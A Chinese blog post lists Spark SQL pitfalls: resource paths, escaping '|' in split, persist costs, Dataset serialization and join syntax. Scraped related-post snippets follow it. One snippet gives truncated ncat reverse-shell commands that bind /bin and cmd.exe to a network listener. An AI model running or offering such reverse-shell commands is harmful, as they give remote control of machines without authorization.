Spark SQL历险记
现在的spark sql编程通常使用scala api 以及 java api的方式,相比于直接使用 spark sql语句,spark api灵活很多,毕竟可以基于dataset以及rdd两种方式进行操作,不过spark sql的坑就有点多了。
1,getClass.getResourceAsStream这个类,网上通常说的是不加"/"是从当前包读取,加了"/"是从根class路径读取,但是根路径并不是在idea或者文件下看到的诸如src/main/resource/这样的路径,而是最终打包时候生成的jar的时候的格式,在生成jar包的时候resource文件夹下会被展开到根路径下,所以如果要加载resource下的资源,只需要"/资源名"就可以了
2、select crossInfo, split(crossInfo, '|') as jda from tem_test_yy lateral view explode(split(jdaList, '#')) tmpTable as crossInfo
这个语句有bug,返回的结果是
jda1||time1 ["j","d","a","","|","","|","t","i","m","e","",""]
jda1||time1 ["j","d","a","","|","","|","t","i","m","e","",""]
jda2||time2 ["j","d","a","","|","","|","t","i","m","e","",""]
jda3||time3 ["|","j","d","a","","|","","|","t","i","m","e","",""]
主要原因是hive里面|字符要使用转义符号!!,所以正确用法是split(crossInfo, '\\|');
3、spark persist不能乱用,尤其是
MEMORY_AND_DISK_SER
级别,对于大表来说,persist效率远不如多执行一遍。。对于几十亿级别的表,效率可降低数倍。。
4、dataframe = dataset[row] ,spark map里面的匿名函数返回值不能是dataset[row],否则会报序列化错误,它只支持dataset[class]的形式,需要在返回以后 在driver端通过 dataset[row].toDF()转成 dataframe也就是dataset[row]才行。但是dataset[row]可以作为map的输入。
5、scala selet("_1.*")和select($"_1"),如果处理的是Tuple[_1,_2]类型的dataset,
后者会生成如下的schema
|-- _1: struct (nullable = true)
| |-- all_jda: string (nullable = true)
| |-- user_visit_ip: string (nullable = true)
| |-- sequence_num: integer (nullable = true)
前者是生成如下的schema
| -- all_jda: string (nullable = true)
| -- user_visit_ip: string (nullable = true)
| -- sequence_num: integer (nullable = true)
这绝对是一个坑=。=,后者会把多一层schema结构,而在spark sql语句中是能直接取到非顶层的列的。。
6、spark sql的一些问题
(1), hive支持使用正则语句,spark sql 不支持
(2), left out join on A.column = B.column 而不能写成 left out join on column;
(3), select * from A left out join B on cloumn会造成ambigious错误 需要小心
(4), concat_ws不支持对除String外的其他类型数组的连接,需要自己实现一个udf
Spark SQL历险记的更多相关文章
- Spark SQL 之 Data Sources
#Spark SQL 之 Data Sources 转载请注明出处:http://www.cnblogs.com/BYRans/ 数据源(Data Source) Spark SQL的DataFram ...
- Spark SQL 之 DataFrame
Spark SQL 之 DataFrame 转载请注明出处:http://www.cnblogs.com/BYRans/ 概述(Overview) Spark SQL是Spark的一个组件,用于结构化 ...
- 【原】Learning Spark (Python版) 学习笔记(三)----工作原理、调优与Spark SQL
周末的任务是更新Learning Spark系列第三篇,以为自己写不完了,但为了改正拖延症,还是得完成给自己定的任务啊 = =.这三章主要讲Spark的运行过程(本地+集群),性能调优以及Spark ...
- Spark 官方文档(5)——Spark SQL,DataFrames和Datasets 指南
Spark版本:1.6.2 概览 Spark SQL用于处理结构化数据,与Spark RDD API不同,它提供更多关于数据结构信息和计算任务运行信息的接口,Spark SQL内部使用这些额外的信息完 ...
- Spark SQL Example
Spark SQL Example This example demonstrates how to use sqlContext.sql to create and load a table ...
- 通过Spark SQL关联查询两个HDFS上的文件操作
order_created.txt 订单编号 订单创建时间 -- :: -- :: -- :: -- :: -- :: order_picked.txt 订单编号 订单提取时间 -- :: ...
- Spark SQL 之 Migration Guide
Spark SQL 之 Migration Guide 支持的Hive功能 转载请注明出处:http://www.cnblogs.com/BYRans/ Migration Guide 与Hive的兼 ...
- Spark SQL 官方文档-中文翻译
Spark SQL 官方文档-中文翻译 Spark版本:Spark 1.5.2 转载请注明出处:http://www.cnblogs.com/BYRans/ 1 概述(Overview) 2 Data ...
- Spark SQL 之 Performance Tuning & Distributed SQL Engine
Spark SQL 之 Performance Tuning & Distributed SQL Engine 转载请注明出处:http://www.cnblogs.com/BYRans/ 缓 ...
随机推荐
- jsp 异步处理
一. 概述 异步处理功能可以节约容器线程.你应该将此功能 使用在长时间运行的操作上.此功能的作用是释放正在 等待完成的线程,使该线程能够被另一请求所使用. 二. 编写异步Servlet和过滤器 We ...
- python中关于变量名失效的案例
案例一:传参动态导入模块. selectModule = input("please input your module name") app_name = input(" ...
- 使用Ncat反弹Shell
ncat -l -n -v -p ncat -e /bin/ ncat -e C:\Windows\system32\cmd.exe
- weblogic 安装部署详解
0x01 weblogic下载安装 去Oracle官网下载Weblogic 10.3.6,选择Generic版本,各版本选择下载地址:http://www.oracle.com/technetwork ...
- C# 集合已修改 可能无法执行枚举操作 zz
今天编写程序时 修改了list集合 在foreach时报 “集合已修改:可能无法执行枚举操作.”错误. 首先想到的是没有锁定集合对象. 增加了 private readonly object sync ...
- S0.1 【转】调色板
摘自<数字图像处理编程入门> 我发在csdn下载区了, 作为免费资源,传送:<数字图像处理编程入门> csdn不允许免费资源了,微盘链接:<数字图像处理编程入门> ...
- python#读csv,excel,json数据
#读csv,excel,json数据 with open('E:\\test\\xdd.csv','r') as f: for line in f.readlines(): print(line) i ...
- 新浪云SAE 关于部分函数不能使用的做法
例如:file_put_contents("test.txt","Hello World. Testing!"); 可以这样写: file_put_conten ...
- css margin使用技巧
margin使用技巧: (1)设置元素水平居中:margin:x auto; (2)margin负值让元素位移及边框合并 水平居中:auto 代码: <!DOCTYPE html> < ...
- vue 监听路由变化
方法一:通过 watch // 监听,当路由发生变化的时候执行 watch:{ $route(to,from){ console.log(to.path); } }, 或 // 监听,当路由发生变化的 ...